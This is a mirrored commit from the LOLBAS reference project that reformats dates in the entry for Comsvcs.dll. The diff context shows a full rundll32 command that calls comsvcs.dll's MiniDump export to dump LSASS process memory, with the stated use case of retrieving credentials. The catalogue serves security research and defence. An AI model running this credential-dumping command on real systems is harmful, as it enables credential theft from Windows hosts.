mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-29 05:31:53 +02:00
Standardise date formats (see https://yaml.org/type/timestamp.html)
This commit is contained in:
@@ -2,10 +2,10 @@
|
||||
Name: Comsvcs.dll
|
||||
Description: COM+ Services
|
||||
Author:
|
||||
Created: '2019-08-30'
|
||||
Created: 2019-08-30
|
||||
Commands:
|
||||
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
|
||||
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
||||
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
|
||||
Usecase: Dump Lsass.exe process memory to retrieve credentials.
|
||||
Category: Dump
|
||||
Privileges: SYSTEM
|
||||
@@ -22,5 +22,5 @@ Resources:
|
||||
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
|
||||
Acknowledgement:
|
||||
- Person: modexp
|
||||
Handle:
|
||||
---
|
||||
Handle:
|
||||
---
|
||||
|
Reference in New Issue
Block a user